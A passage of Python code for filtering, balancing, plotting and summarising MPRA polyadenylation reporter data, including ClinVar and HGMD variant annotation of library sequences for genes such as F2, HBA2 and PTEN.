def __init__(self, included_libs) :
super(LibrarySelector, self).__init__('lib_selector')
self.included_libs = included_libs
def _prepare(self, library_dict) :
keep_index = np.nonzero(library_dict['data']['library_index'].isin(self.included_libs))[0]
new_library_dict = { 'metadata' : library_dict['metadata'] }
new_library_dict['data'] = library_dict['data'].iloc[keep_index].reset_index(drop=True)
new_library_dict['cuts'] = library_dict['cuts'][keep_index]
return new_library_dict
def __call__(self, library_dict) :
return self._prepare(library_dict)
class LibraryBalancer(LibraryPreparer) :
def __init__(self, included_libs) :
super(LibraryBalancer, self).__init__('lib_balancer')
self.included_libs = included_libs
def _prepare(self, library_dict) :
L_included = self.included_libs
arranged_index_len = 0
arranged_index_len = int(np.sum([len(np.nonzero(library_dict['data']['library_index'] == lib)[0]) for lib in L_included]))
min_join_len = int(np.min([len(np.nonzero(library_dict['data']['library_index'] == lib)[0]) for lib in L_included]))
arranged_index = np.zeros(arranged_index_len, dtype=np.int)
arranged_remainder_index = 0
arranged_join_index = arranged_index_len - len(L_included) * min_join_len
for lib_i in range(0, len(L_included)) :
lib = L_included[lib_i]
print('Arranging lib ' + str(lib))
#1. Get indexes of each Library
lib_index = np.nonzero(library_dict['data']['library_index'] == lib)[0]
#2. Sort indexes of each library by count
lib_count = library_dict['data'].iloc[lib_index]['total_count']
sort_index_lib = np.argsort(lib_count)
lib_index = lib_index[sort_index_lib]
#3. Shuffle indexes of each library modulo 2
even_index_lib = np.nonzero(np.arange(len(lib_index)) % 2 == 0)[0]
odd_index_lib = np.nonzero(np.arange(len(lib_index)) % 2 == 1)[0]
lib_index_even = lib_index[even_index_lib]
lib_index_odd = lib_index[odd_index_lib]
lib_index = np.concatenate([lib_index_even, lib_index_odd])
#4. Join modulo 2
i = 0
for j in range(len(lib_index) - min_join_len, len(lib_index)) :
arranged_index[arranged_join_index + i * len(L_included) + lib_i] = lib_index[j]
i += 1
#5. Append remainder
for j in range(0, len(lib_index) - min_join_len) :
arranged_index[arranged_remainder_index] = lib_index[j]
arranged_remainder_index += 1
new_library_dict = { 'metadata' : library_dict['metadata'] }
new_library_dict['data'] = library_dict['data'].iloc[arranged_index].reset_index(drop=True)
new_library_dict['cuts'] = library_dict['cuts'][arranged_index]
#Perform final read count control check between dataframe and cut matrix
total_count_from_cuts = np.ravel(new_library_dict['cuts'].sum(axis=1)) + np.ravel(new_library_dict['data']['distal_count'].values)
if not np.all(total_count_from_cuts == np.array(new_library_dict['data']['total_count'].values)) :
print('Error! Count mismatch between dataframe and cut matrix.')
return new_library_dict
def __call__(self, library_dict) :
return self._prepare(library_dict)
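# Illustrative preparation pipeline (hypothetical thresholds and library ids;
# the real values depend on the MPRA experiment being processed):
#   library_dict = LibraryCountFilter(minimum_count=6)(library_dict)
#   library_dict = LibrarySelector(included_libs=[2, 5, 8, 11])(library_dict)
#   library_dict = LibraryBalancer(included_libs=[2, 5, 8, 11])(library_dict)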
def plot_cumulative_library_proportion(library_dict, percentile_step=0.05, figsize=(12, 8), n_xticks=10, n_yticks=10) :
library_fractions_from_top = np.linspace(0, 1, num=int(1. / percentile_step) + 1)[1:]
libs = library_dict['data']['library'].unique()
cum_fraction = np.zeros((len(library_fractions_from_top), len(libs)))
total_lib_size = float(len(library_dict['data']))
frac_i = 0
for library_fraction in library_fractions_from_top :
lib_i = 0
for lib in libs :
lib_slice = library_dict['data'].iloc[-int(library_fraction * total_lib_size):]
lib_size = len(np.nonzero((lib_slice['library'] == lib))[0])
curr_frac = float(lib_size) / float(len(lib_slice))
cum_fraction[frac_i, lib_i] = curr_frac
lib_i += 1
frac_i += 1
fig = plt.subplots(figsize=figsize)
plt.stackplot(library_fractions_from_top, np.fliplr(cum_fraction.T), labels=libs)
plt.legend(loc='upper left', fontsize=12)
plt.xticks(np.linspace(0, 1, num=n_xticks + 1)[:-1], np.round(np.linspace(0, 1, num=n_xticks + 1), 2)[:-1], fontsize=14, rotation=45)
plt.yticks(np.linspace(0, 1, num=n_yticks + 1), np.round(np.linspace(0, 1, num=n_yticks + 1), 2), fontsize=14)
plt.xlim(np.min(library_fractions_from_top), np.max(library_fractions_from_top))
plt.ylim(0, 1)
plt.xlabel('Percentile of data (low to high read count)', fontsize=14)
plt.ylabel('Library proportion of Percentile to 100%', fontsize=14)
plt.title('Cumulative library proportion', fontsize=16)
plt.tight_layout()
plt.show()
def plot_library_cut_profile(library_dict, figsize=(12, 8)) :
f = plt.figure(figsize=figsize)
libs = library_dict['data']['library'].unique()
ls = []
for lib in libs :
lib_index = np.nonzero((library_dict['data']['library'] == lib))[0]
proximal_profile = np.ravel(library_dict['cuts'][lib_index].sum(axis=0))
proximal_profile /= np.sum(proximal_profile)
la, = plt.plot(np.arange(len(proximal_profile)), proximal_profile, linewidth=2, label=lib)
ls.append(la)
#Proximal 1
plt.axvline(x=70, linewidth=2, c='black', linestyle='--')
plt.axvline(x=70 + 6, linewidth=2, c='black', linestyle='--')
plt.axvline(x=70 + 21, linewidth=2, c='orange', linestyle='--')
plt.xticks(fontsize=14)
plt.yticks(fontsize=14)
plt.xlabel('Position', fontsize=14)
plt.ylabel('Read count', fontsize=14)
plt.title('Proximal site', fontsize=16)
plt.tight_layout()
plt.legend(handles = ls, fontsize=12)
plt.show()
def plot_individual_library_count_distribution(library_dict, figsize=(12, 8), n_xticks=10, y_max=500) :
total_count = np.ravel(library_dict['data']['total_count'].values)
libs = library_dict['data']['library'].unique()
fig = plt.figure(figsize=figsize)
ls = []
for lib in libs :
lib_index = np.nonzero(library_dict['data']['library'] == lib)[0]
lib_slice = library_dict['data'].iloc[lib_index]
lib_count = np.ravel(lib_slice['total_count'].values)
lib_frac = np.arange(len(lib_slice)) / float(len(lib_slice))
lt, = plt.plot(lib_frac, lib_count, linewidth=2, label=lib)
ls.append(lt)
plt.legend(handles=ls, loc='upper left', fontsize=12)
plt.xticks(np.round(np.linspace(0, 1, num=n_xticks + 1), 2), np.round(np.linspace(0, 1, num=n_xticks + 1), 2), fontsize=14, rotation=45)
plt.yticks(fontsize=14)
plt.xlim(0, 1)
plt.ylim(0, y_max)
plt.xlabel('Percentile of data', fontsize=14)
plt.ylabel('Read count', fontsize=14)
plt.title('Individual library count distribution', fontsize=16)
plt.tight_layout()
plt.show()
def plot_combined_library_count_distribution(library_dict, figsize=(12, 8), n_xticks=10, x_min=0, x_max=1, y_max=500) :
total_count = np.ravel(library_dict['data']['total_count'].values)
total_lib_frac = np.arange(total_count.shape[0]) / float(total_count.shape[0])
libs = library_dict['data']['library'].unique()
fig = plt.figure(figsize=figsize)
ls = []
for lib in libs :
lib_index = np.nonzero(library_dict['data']['library'] == lib)[0]
lib_slice = library_dict['data'].iloc[lib_index]
lib_count = np.ravel(lib_slice['total_count'].values)
lib_frac = total_lib_frac[lib_index]
lt, = plt.plot(lib_frac, lib_count, linewidth=2, label=lib)
ls.append(lt)
plt.legend(handles=ls, loc='upper left', fontsize=12)
plt.xticks(np.round(np.linspace(0, 1, num=n_xticks + 1), 2), np.round(np.linspace(0, 1, num=n_xticks + 1), 2), fontsize=14, rotation=45)
plt.yticks(fontsize=14)
plt.xlim(x_min, x_max)
plt.ylim(0, y_max)
plt.xlabel('Percentile of data', fontsize=14)
plt.ylabel('Read count', fontsize=14)
plt.title('Combined library count distribution', fontsize=16)
plt.tight_layout()
plt.show()
#Designed MPRA aggregate functions
def group_dataframe(df, cuts, cut_start=None, min_total_count=1, drop_nans=False, nan_prox_range=[57, 87], misprime_filters=None, groupby_list=['master_seq']) :
print('Collapsing with groupby = ' + str(groupby_list))
df_copy = df.copy().reset_index(drop=True)
cuts_dense = np.array(cuts.todense())
if cut_start is not None :
cuts_dense = np.array(cuts.todense())[:, cut_start:]
cuts_dense = np.hstack([cuts_dense, np.ravel(df_copy['distal_count'].values).reshape(-1, 1)])
df_copy['cuts'] = cuts_dense.tolist()
print('Filtering...')
print('Size before filtering = ' + str(len(df_copy)))
df_copy['prox_ratio_temp'] = np.sum(cuts_dense[:, nan_prox_range[0]:nan_prox_range[1]], axis=1) / np.sum(cuts_dense, axis=1)
if drop_nans :
df_copy = df_copy.query("total_count >= " + str(min_total_count) + " and prox_ratio_temp > 0.0 and prox_ratio_temp < 1.0").reset_index(drop=True)
else :
df_copy = df_copy.query("total_count >= " + str(min_total_count)).reset_index(drop=True)
if misprime_filters is not None :
misprime_query = ""
experiment_i = 0
for experiment in misprime_filters :
if experiment != 'all' :
misprime_query += "not (experiment == '" + experiment + "' and ("
else :
misprime_query += "not ("
for filter_i, filter_id in enumerate(misprime_filters[experiment]) :
misprime_query += filter_id + " == True"
if filter_i < len(misprime_filters[experiment]) - 1 :
misprime_query += " or "
else :
misprime_query += ")"
if experiment_i < len(misprime_filters) - 1 :
misprime_query += ") and "
else :
misprime_query += ")"
experiment_i += 1
df_copy = df_copy.query(misprime_query).reset_index(drop=True)
print('Size after filtering = ' + str(len(df_copy)))
df_group = df_copy.groupby(groupby_list)
list_f = lambda x: tuple(x)
agg_dict = {
'experiment' : 'first',
'subexperiment' : 'first',
'gene' : 'first',
'significance' : 'first',
'clinvar_id' : 'first',
'variant' : 'first',
'in_acmg' : 'first',
'sitetype' : 'first',
'wt_seq' : 'first',
'predicted_logodds' : 'first',
'predicted_usage' : 'first',
'barcode' : list_f,
'proximal_count' : list_f,
'distal_count' : list_f,
'total_count' : list_f,
'cuts' : lambda x: tuple([np.array(l) for l in x])#tuple(x.tolist())
}
if 'master_seq' not in groupby_list :
agg_dict['master_seq'] = 'first'
df_agg = df_group.agg(agg_dict)
print('Grouped dataframe.')
return df_agg
def summarize_dataframe(df, min_barcodes=1, min_pooled_count=1, min_mean_count=1, prox_cut_start=55, prox_cut_end=85, isoform_pseudo_count=0, pooled_isoform_pseudo_count=0, cut_pseudo_count=0, drop_nans=False) :
print('Filtering...')
df['n_barcodes'] = df['barcode'].apply(lambda t: len(t))
df['pooled_total_count'] = df['total_count'].apply(lambda t: np.sum(np.array(list(t))))
df['mean_total_count'] = df['total_count'].apply(lambda t: np.mean(np.array(list(t))))
df = df.query("n_barcodes >= " + str(min_barcodes) + " and pooled_total_count >= " + str(min_pooled_count) + " and mean_total_count >= " + str(min_mean_count)).copy()
print('Summarizing...')
df['pooled_cuts'] = df['cuts'].apply(lambda t: np.sum(np.array(list(t)), axis=0))
df['mean_cuts'] = df['cuts'].apply(lambda t: np.mean(np.vstack([ x for x in list(t) ]), axis=0))
df['pooled_cut_prob'] = df['cuts'].apply(lambda t: np.sum(np.array(list(t)), axis=0) / np.sum(np.array(list(t))))
df['mean_cut_prob'] = df['cuts'].apply( lambda t: np.mean(np.vstack([ x / np.sum(x) for x in list(t) ]), axis=0) )
df['proximal_count'] = df['cuts'].apply(lambda t: tuple([np.sum(x[prox_cut_start: prox_cut_end]) for x in t]))
proximal_distrib = df['cuts'].apply(lambda t: tuple([(x[prox_cut_start: prox_cut_end] + cut_pseudo_count) / np.sum(x[prox_cut_start: prox_cut_end] + cut_pseudo_count) for x in t]))
df['proximal_avgcut'] = proximal_distrib.apply(lambda t: tuple([np.sum(x * (np.arange(prox_cut_end - prox_cut_start))) for x in t]))
df['pooled_proximal_count'] = df['proximal_count'].apply(lambda t: np.sum(np.array(list(t))))
df['pooled_distal_count'] = df['distal_count'].apply(lambda t: np.sum(np.array(list(t))))
df['proximal_usage'] = df.apply(lambda row: tuple([(p + isoform_pseudo_count) / (t + 2. * isoform_pseudo_count) for p, t in zip(list(row['proximal_count']), list(row['total_count']))]), axis=1)
df['proximal_logodds'] = df['proximal_usage'].apply(lambda t: tuple([np.log(p / (1. - p)) for p in list(t)]))
df['pooled_proximal_usage'] = (df['pooled_proximal_count'] + pooled_isoform_pseudo_count) / (df['pooled_total_count'] + 2. * pooled_isoform_pseudo_count)
df['mean_proximal_usage'] = df['proximal_usage'].apply(lambda t: np.mean(list(t)))
df['median_proximal_usage'] = df['proximal_usage'].apply(lambda t: np.median(list(t)))
df['std_proximal_usage'] = df['proximal_usage'].apply(lambda t: np.std(list(t)))
df['pooled_proximal_logodds'] = np.log(df['pooled_proximal_usage'] / (1. - df['pooled_proximal_usage']))
df['mean_proximal_logodds'] = df['proximal_logodds'].apply(lambda t: np.mean(list(t)))
df['median_proximal_logodds'] = df['proximal_logodds'].apply(lambda t: np.median(list(t)))
df['std_proximal_logodds'] = df['proximal_logodds'].apply(lambda t: np.std(list(t)))
df['mean_proximal_avgcut'] = df['proximal_avgcut'].apply(lambda t: np.mean(list(t)))
df['median_proximal_avgcut'] = df['proximal_avgcut'].apply(lambda t: np.median(list(t)))
df['std_proximal_avgcut'] = df['proximal_avgcut'].apply(lambda t: np.std(list(t)))
#Proximal Vs. Distal
df['competing_count'] = df['cuts'].apply(lambda t: tuple([np.sum(x[:prox_cut_start]) for x in t]))
df['pooled_competing_count'] = df['competing_count'].apply(lambda t: np.sum(np.array(list(t))))
df['proximal_vs_distal_usage'] = df.apply(lambda row: tuple([(p + isoform_pseudo_count) / (p + c + d + 2. * isoform_pseudo_count) for p, c, d in zip(list(row['proximal_count']), list(row['competing_count']), list(row['distal_count']))]), axis=1)
df['proximal_vs_distal_logodds'] = df['proximal_vs_distal_usage'].apply(lambda t: tuple([np.log(p / (1. - p)) for p in list(t)]))
df['pooled_proximal_vs_distal_usage'] = (df['pooled_proximal_count'] + pooled_isoform_pseudo_count) / (df['pooled_proximal_count'] + df['pooled_competing_count'] + df['pooled_distal_count'] + 2. * pooled_isoform_pseudo_count)
df['mean_proximal_vs_distal_usage'] = df['proximal_vs_distal_usage'].apply(lambda t: np.mean(list(t)))
df['median_proximal_vs_distal_usage'] = df['proximal_vs_distal_usage'].apply(lambda t: np.median(list(t)))
df['pooled_proximal_vs_distal_logodds'] = np.log(df['pooled_proximal_vs_distal_usage'] / (1. - df['pooled_proximal_vs_distal_usage']))
df['mean_proximal_vs_distal_logodds'] = df['proximal_vs_distal_logodds'].apply(lambda t: np.mean(list(t)))
df['median_proximal_vs_distal_logodds'] = df['proximal_vs_distal_logodds'].apply(lambda t: np.median(list(t)))
print('Dropping intermediate columns...')
if drop_nans == True :
df['pooled_proximal_logodds_is_nan'] = np.isnan(df['pooled_proximal_logodds']) | np.isinf(df['pooled_proximal_logodds'])
df['mean_proximal_logodds_is_nan'] = np.isnan(df['mean_proximal_logodds']) | np.isinf(df['mean_proximal_logodds'])
df['mean_proximal_avgcut_nan'] = np.isnan(df['mean_proximal_avgcut']) | np.isinf(df['mean_proximal_avgcut'])
#df = df.query("pooled_proximal_logodds_is_nan == False and mean_proximal_logodds_is_nan == False").copy()# and mean_proximal_avgcut_nan == False
df = df.query("pooled_proximal_logodds_is_nan == False").copy()# and mean_proximal_avgcut_nan == False
df = df.drop(columns=['pooled_proximal_logodds_is_nan', 'mean_proximal_logodds_is_nan', 'mean_proximal_avgcut_nan'])
df = df.drop(columns=['barcode', 'total_count', 'proximal_count', 'distal_count', 'proximal_usage', 'proximal_logodds', 'proximal_vs_distal_usage', 'proximal_vs_distal_logodds', 'cuts', 'proximal_avgcut'])
df = df.reset_index()
return df
def manual_df_processing(seq_df, clinvar_snv_df) :
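    # Re-annotates library sequences against the ClinVar SNV table, maps snv/indel
    # variants back to their wild-type reference sequences via Hamming distance,
    # and records TGTA motif positions for the 'tgta' experiment.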
#Re-annotate SNV mutations against Clinvar
clinvar_snv_df['master_seq'] = clinvar_snv_df['var'].str.slice(0, 164)
clinvar_snv_df = clinvar_snv_df.set_index('master_seq')
clinvar_snv_df = clinvar_snv_df[['significance', 'clinvar_id', 'observed_usage', 'in_acmg']]
clinvar_snv_df = clinvar_snv_df.rename({'observed_usage' : 'apadb_usage'})
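    # NOTE: without columns=/axis=1 this rename targets the index, so the
    # 'observed_usage' column keeps its name (the code below still refers to it).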
seq_df['significance'] = 'Missing'
seq_df['clinvar_id'] = 'Missing'
seq_df['in_acmg'] = 'No'
seq_df.loc[(seq_df.experiment == 'acmg_apadb') | (seq_df.experiment == 'acmg_polyadb'), 'in_acmg'] = 'Yes'
seq_df['apadb_logodds'] = np.nan
seq_df = seq_df.join(clinvar_snv_df, on='master_seq', how='left', rsuffix='_clinvarcopy').copy()
valid_index = seq_df['clinvar_id_clinvarcopy'].notna()
seq_df.loc[valid_index, 'clinvar_id'] = seq_df.loc[valid_index, 'clinvar_id_clinvarcopy']
seq_df.loc[valid_index, 'significance'] = seq_df.loc[valid_index, 'significance_clinvarcopy']
seq_df.loc[valid_index, 'in_acmg'] = seq_df.loc[valid_index, 'in_acmg_clinvarcopy']
seq_df.loc[valid_index, 'apadb_logodds'] = seq_df.loc[valid_index, 'observed_usage']
seq_df = seq_df.drop(columns=['clinvar_id_clinvarcopy', 'significance_clinvarcopy', 'in_acmg_clinvarcopy', 'observed_usage']).copy()
#Re-map snv variants to wt sequences
def hamming_distance(seq1, seq2) :
dist = 0
for j in range(0, len(seq1)) :
if seq1[j] != seq2[j] :
dist += 1
return dist
wt_dict = {}
for index, row in seq_df.iterrows() :
if row['variant'] == 'wt' :
wt_gene = row['gene']
if 'MAN_' in wt_gene :
wt_gene = wt_gene.replace('MAN_', '')
#wt_gene = wt_gene[:wt_gene.index('.')]
if wt_gene not in wt_dict :
wt_dict[wt_gene] = []
wt_dict[wt_gene].append(row['master_seq'])
#Append special case wt mappings
if 'HBB.2' in wt_dict and 'HBB.3' in wt_dict :
wt_dict['HBB.2'].extend(wt_dict['HBB.3'])
wt_seqs = []
for index, row in seq_df.iterrows() :
wt_seq = row['wt_seq']
if wt_seq == 'Unmapped' and row['gene'] in wt_dict :
if row['variant'] == 'snv' :
for wt_seq_candidate in wt_dict[row['gene']] :
if hamming_distance(row['master_seq'], wt_seq_candidate) == 1 :
wt_seq = wt_seq_candidate
break
elif row['variant'] == 'indel' and len(wt_dict[row['gene']]) == 1 :
if hamming_distance(row['master_seq'][:20], wt_dict[row['gene']][0][:20]) == 0 :
wt_seq = wt_dict[row['gene']][0]
wt_seqs.append(wt_seq)
seq_df['wt_seq'] = wt_seqs
#Map TGTA variants to wt sequence
tgta_wts = list(seq_df.query("experiment == 'tgta' and subexperiment == 'n=0'")['master_seq'].values)
tgta_wts.extend(list(seq_df.loc[(seq_df.master_seq.str.contains('AGAGGATCAATCCCATCAGTGG')) & (seq_df.subexperiment == 'n=1')]['master_seq'].values))
wt_seqs = []
tgta_fixed = []
for index, row in seq_df.iterrows() :
wt_seq = row['wt_seq']
if wt_seq == 'Unmapped' and row['experiment'] == 'tgta' :
min_dist = 30
min_wt_seq = 'Unmapped'
for wt_seq_candidate in tgta_wts :
hamming_dist = hamming_distance(row['master_seq'], wt_seq_candidate)
if hamming_dist < min_dist :
min_dist = hamming_dist
min_wt_seq = wt_seq_candidate
wt_seq = min_wt_seq
wt_seqs.append(wt_seq)
if 'AGAGGATCAATCCCATCAGTGG' in row['master_seq'] :
tgta_fixed.append(True)
else :
tgta_fixed.append(False)
seq_df['wt_seq'] = wt_seqs
seq_df['tgta_fixed'] = tgta_fixed
#Map TGTA mut positions
tgta_pos_1_list = []
tgta_pos_2_list = []
tgta_pos_3_list = []
for index, row in seq_df.iterrows() :
tgta_pos_1 = 0
tgta_pos_2 = 0
tgta_pos_3 = 0
if row['experiment'] == 'tgta' :
tgta_start_pos = 0
if row['subexperiment'] in ['n=1', 'n=2', 'n=3'] :
for j in range(tgta_start_pos, len(row['master_seq']) - 3) :
if row['master_seq'][j:j+4] != row['wt_seq'][j:j+4] and row['master_seq'][j:j+4] == 'TGTA' :
tgta_start_pos = j
break
tgta_pos_1 = tgta_start_pos
if row['subexperiment'] in ['n=2', 'n=3'] :
for j in range(tgta_start_pos + 4, len(row['master_seq']) - 3) :
if row['master_seq'][j:j+4] != row['wt_seq'][j:j+4] and row['master_seq'][j:j+4] == 'TGTA' :
tgta_start_pos = j
break
tgta_pos_2 = tgta_start_pos
tgta_pos_1_list.append(tgta_pos_1)
tgta_pos_2_list.append(tgta_pos_2)
tgta_pos_3_list.append(tgta_pos_3)
seq_df['tgta_pos_1'] = tgta_pos_1_list
seq_df['tgta_pos_2'] = tgta_pos_2_list
seq_df['tgta_pos_3'] = tgta_pos_3_list
return seq_df
#Manually annotate SNVs from HGMD
def manually_annotate_hgmd_variants(seq_df_delta) :
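    # Hard-codes 'significance' and 'clinvar_id' annotations for specific HGMD
    # variant sequences, indexed by their full master_seq string.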
seq_df_delta = seq_df_delta.set_index('master_seq')
#F2.1
seq_df_delta.loc['AACCAATCCCGTGAAAGAATTATTTTTGTGTTTCTAAAACTATGGTTCCCAATAAAAGTGACTCTCAGTGAGCCTCAATGCTCCCAGTGCTATTCATGGGCAGCTCTCTGGGCTCAGGAAGAGCCAGTAATACTACTGGATAAAGAAGACTTAAGAATCCACCA', 'significance'] = 'Undetermined'
seq_df_delta.loc['AACCAATCCCGTGAAAGAATTATTTTTGTGTTTCTAAAACTATGGTTCCCAATAAAAGTGACTCTCAGTGAGCCTCAATGCTCCCAGTGCTATTCATGGGCAGCTCTCTGGGCTCAGGAAGAGCCAGTAATACTACTGGATAAAGAAGACTTAAGAATCCACCA', 'clinvar_id'] = 'c.*96C>T'
seq_df_delta.loc['AACCAATCCCGTGAAAGAATTATTTTTGTGTTTCTAAAACTATGGTTCCCAATAAAAGTGACTCTCAGCGAGCCTCAAAGCTCCCAGTGCTATTCATGGGCAGCTCTCTGGGCTCAGGAAGAGCCAGTAATACTACTGGATAAAGAAGACTTAAGAATCCACCA', 'significance'] = 'Undetermined'
seq_df_delta.loc['AACCAATCCCGTGAAAGAATTATTTTTGTGTTTCTAAAACTATGGTTCCCAATAAAAGTGACTCTCAGCGAGCCTCAAAGCTCCCAGTGCTATTCATGGGCAGCTCTCTGGGCTCAGGAAGAGCCAGTAATACTACTGGATAAAGAAGACTTAAGAATCCACCA', 'clinvar_id'] = 'c.*106T>A'
seq_df_delta.loc['AACCAATCCCGTGAAAGAATTATTTTTGTGTTTCTAAAACTATGGTTCCCAATAAAAGTGACTCTCAGCGAGCCTCAATGTTCCCAGTGCTATTCATGGGCAGCTCTCTGGGCTCAGGAAGAGCCAGTAATACTACTGGATAAAGAAGACTTAAGAATCCACCA', 'significance'] = 'Pathogenic'
seq_df_delta.loc['AACCAATCCCGTGAAAGAATTATTTTTGTGTTTCTAAAACTATGGTTCCCAATAAAAGTGACTCTCAGCGAGCCTCAATGTTCCCAGTGCTATTCATGGGCAGCTCTCTGGGCTCAGGAAGAGCCAGTAATACTACTGGATAAAGAAGACTTAAGAATCCACCA', 'clinvar_id'] = 'c.*108C>T'
#HBA2.2
seq_df_delta.loc['CTCCCAACGGGCCCTCCTCCCCTCCTTGCACCGGCCCTTCCTGGTCTTTGAATAAAGTCTGAGTGTGCAGCAGCCTGTGTGTGCCTGGGTTCTCTCTATCCCGGAATGTGCCAACAATGGAGGTGTTTACCTGTCTCAGACCAAGGACCTCTCTGCAGCTGCAT', 'significance'] = 'Pathogenic'
seq_df_delta.loc['CTCCCAACGGGCCCTCCTCCCCTCCTTGCACCGGCCCTTCCTGGTCTTTGAATAAAGTCTGAGTGTGCAGCAGCCTGTGTGTGCCTGGGTTCTCTCTATCCCGGAATGTGCCAACAATGGAGGTGTTTACCTGTCTCAGACCAAGGACCTCTCTGCAGCTGCAT', 'clinvar_id'] = 'c.*104G>T'
#seq_df_delta.loc['CTCCCAAAGGGCCCTCCTCCCCTCCTTGCACCGGCCCTTCCTGGTCTTTGAATAAAGTCTGAGTGGGCAGCAGCCTGTGTGTGCCTGGGTTCTCTCTATCCCGGAATGTGCCAACAATGGAGGTGTTTACCTGTCTCAGACCAAGGACCTCTCTGCAGCTGCAT', 'significance'] = 'Undetermined'
#seq_df_delta.loc['CTCCCAAAGGGCCCTCCTCCCCTCCTTGCACCGGCCCTTCCTGGTCTTTGAATAAAGTCTGAGTGGGCAGCAGCCTGTGTGTGCCTGGGTTCTCTCTATCCCGGAATGTGCCAACAATGGAGGTGTTTACCTGTCTCAGACCAAGGACCTCTCTGCAGCTGCAT', 'clinvar_id'] = 'c.*46C>A'
#seq_df_delta.loc['CTCCCAATGGGCCCTCCTCCCCTCCTTGCACCGGCCCTTCCTGGTCTTTGAATAAAGTCTGAGTGGGCAGCAGCCTGTGTGTGCCTGGGTTCTCTCTATCCCGGAATGTGCCAACAATGGAGGTGTTTACCTGTCTCAGACCAAGGACCTCTCTGCAGCTGCAT', 'significance'] = 'Undetermined'
#seq_df_delta.loc['CTCCCAATGGGCCCTCCTCCCCTCCTTGCACCGGCCCTTCCTGGTCTTTGAATAAAGTCTGAGTGGGCAGCAGCCTGTGTGTGCCTGGGTTCTCTCTATCCCGGAATGTGCCAACAATGGAGGTGTTTACCTGTCTCAGACCAAGGACCTCTCTGCAGCTGCAT', 'clinvar_id'] = 'c.*46C>T'
seq_df_delta.loc['CTCCCAACGGGCCCTCCTCCCCTCCTTGCACCGGCCCTTCCTGATCTTTGAATAAAGTCTGAGTGGGCAGCAGCCTGTGTGTGCCTGGGTTCTCTCTATCCCGGAATGTGCCAACAATGGAGGTGTTTACCTGTCTCAGACCAAGGACCTCTCTGCAGCTGCAT', 'significance'] = 'Undetermined'
seq_df_delta.loc['CTCCCAACGGGCCCTCCTCCCCTCCTTGCACCGGCCCTTCCTGATCTTTGAATAAAGTCTGAGTGGGCAGCAGCCTGTGTGTGCCTGGGTTCTCTCTATCCCGGAATGTGCCAACAATGGAGGTGTTTACCTGTCTCAGACCAAGGACCTCTCTGCAGCTGCAT', 'clinvar_id'] = 'c.*82G>A'
seq_df_delta.loc['CTCCCAACGGGCCCTCCTCCCCTCCTTGCACCGGCCCTTCCTGGTCTTTGAATAAAGTCCGAGTGGGCAGCAGCCTGTGTGTGCCTGGGTTCTCTCTATCCCGGAATGTGCCAACAATGGAGGTGTTTACCTGTCTCAGACCAAGGACCTCTCTGCAGCTGCAT', 'significance'] = 'Conflicting'
seq_df_delta.loc['CTCCCAACGGGCCCTCCTCCCCTCCTTGCACCGGCCCTTCCTGGTCTTTGAATAAAGTCCGAGTGGGCAGCAGCCTGTGTGTGCCTGGGTTCTCTCTATCCCGGAATGTGCCAACAATGGAGGTGTTTACCTGTCTCAGACCAAGGACCTCTCTGCAGCTGCAT', 'clinvar_id'] = 'c.*98T>C'
seq_df_delta.loc['CTCCCAACGGGCCCTCCTCCCCTCCTTGCACCGGCCCTTCCTGGTCTTTGAATAAAGTCTGAGTAGGCAGCAGCCTGTGTGTGCCTGGGTTCTCTCTATCCCGGAATGTGCCAACAATGGAGGTGTTTACCTGTCTCAGACCAAGGACCTCTCTGCAGCTGCAT', 'significance'] = 'Conflicting'
seq_df_delta.loc['CTCCCAACGGGCCCTCCTCCCCTCCTTGCACCGGCCCTTCCTGGTCTTTGAATAAAGTCTGAGTAGGCAGCAGCCTGTGTGTGCCTGGGTTCTCTCTATCCCGGAATGTGCCAACAATGGAGGTGTTTACCTGTCTCAGACCAAGGACCTCTCTGCAGCTGCAT', 'clinvar_id'] = 'c.*103G>A'
#PTEN.15
seq_df_delta.loc['ATGTATATACCTTTTTGTGTCAAAAGGACATTTAAAATTCAATTAGGATTAATAAAGATGGCACTTTCCCATTTTATTCCAGTTTTATAAAAAGTGGAGACAGACTGATGTGTATACGTAGGAATTTTTTCCTTTTGTGTTCTGTCACCAACTGAAGTGGCTAA', 'significance'] = 'Likely benign'
seq_df_delta.loc['ATGTATATACCTTTTTGTGTCAAAAGGACATTTAAAATTCAATTAGGATTAATAAAGATGGCACTTTCCCATTTTATTCCAGTTTTATAAAAAGTGGAGACAGACTGATGTGTATACGTAGGAATTTTTTCCTTTTGTGTTCTGTCACCAACTGAAGTGGCTAA', 'clinvar_id'] = 'c.*282G>A'
#PTEN.16
seq_df_delta.loc['TCTGAATTTTTTTTTATCAAGAGGGATAAAACACCATGAAAATAAACTTGAATAAACTGAAAATGGACCTTTTTTTTTCTAATGGCAATAGGACATTGTGTCAGATTACCAGTTATAGGAACAATTCTCTTTTCCTGACCAATCTTGTTTTACCCTATACATCC', 'significance'] = 'Undetermined'
seq_df_delta.loc['TCTGAATTTTTTTTTATCAAGAGGGATAAAACACCATGAAAATAAACTTGAATAAACTGAAAATGGACCTTTTTTTTTCTAATGGCAATAGGACATTGTGTCAGATTACCAGTTATAGGAACAATTCTCTTTTCCTGACCAATCTTGTTTTACCCTATACATCC', 'clinvar_id'] = 'c.*74T>C'
seq_df_delta.loc['TCTGAATTTTTTTTTATCAAGAGGGATAAAACACCATGAAAATAAACTTGAATAAACTGAAAATGGACCTTTTTTTTTTTAAGGGCAATAGGACATTGTGTCAGATTACCAGTTATAGGAACAATTCTCTTTTCCTGACCAATCTTGTTTTACCCTATACATCC', 'significance'] = 'Likely benign'
seq_df_delta.loc['TCTGAATTTTTTTTTATCAAGAGGGATAAAACACCATGAAAATAAACTTGAATAAACTGAAAATGGACCTTTTTTTTTTTAAGGGCAATAGGACATTGTGTCAGATTACCAGTTATAGGAACAATTCTCTTTTCCTGACCAATCTTGTTTTACCCTATACATCC', 'clinvar_id'] = 'c.*78T>G'
seq_df_delta.loc['TCTGAATTTTTTTTTATCAAGAGGGATAAAACACCATGAAAATAAACTTGAATAAACTGAAAATGGACCCTTTTTTTTTTAATGGCAATAGGACATTGTGTCAGATTACCAGTTATAGGAACAATTCTCTTTTCCTGACCAATCTTGTTTTACCCTATACATCC', 'significance'] = 'Undetermined'
seq_df_delta.loc['TCTGAATTTTTTTTTATCAAGAGGGATAAAACACCATGAAAATAAACTTGAATAAACTGAAAATGGACCCTTTTTTTTTTAATGGCAATAGGACATTGTGTCAGATTACCAGTTATAGGAACAATTCTCTTTTCCTGACCAATCTTGTTTTACCCTATACATCC', 'clinvar_id'] = 'c.*65T>C'
#BRCA1.1
